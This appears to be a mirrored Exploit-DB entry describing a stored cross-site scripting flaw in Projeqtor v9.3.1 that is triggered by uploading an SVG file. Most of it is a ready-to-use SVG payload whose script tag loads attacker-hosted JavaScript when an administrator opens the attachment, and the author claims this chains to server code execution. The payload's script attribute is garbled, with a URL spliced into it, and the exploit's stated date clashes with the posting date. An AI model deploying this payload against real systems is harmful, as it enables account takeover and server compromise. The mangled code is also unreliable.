Projeqtor v9.3.1 – Stored Cross Site Scripting (XSS)

• Exploit Database
• 17 阅读

• 作者： Oscar Gil Gutierrez
  日期： 2022-01-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50641/

• # Exploit Title: Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)
  # Exploit Author: Oscar Gutierrez (m4xp0w3r)
  # Date: January 4, 2021
  # Vendor Homepage: https://www.projeqtor.org/en/
  # Software Link: https://www.projeqtor.org/en/product-en/downloads
  # Tested on: Ubuntu, LAAMP
  # Vendor: Projeqtor
  # Version: v9.3.1
  
  # Exploit Description:
  Projeqtor version 9.3.1 suffers from a stored XSS vulnerability via SVG file upload. A low level user can upload svg images that contain malicious Javascript. In this way an attacker can escalate privileges and upload a malicious plugin which results in arbitrary code execution in the server hosting the application.
  
  # Steps to reproduce:
  Upload the following XML code as an SVG file and change the xlink for a location that you control. Once the administrator user opens the attachment, the Javascript code hosted by the attacker will execute.
  
  <?xml version="1.0" standalone="no"?>
  <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  
  <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
  <script xlink:href="https://www.exploit-db.com/exploits/50641/<script src=CHANGE THIS FOR THE LOCATION OF YOUR SCRIPT></script>"></script>
  </svg>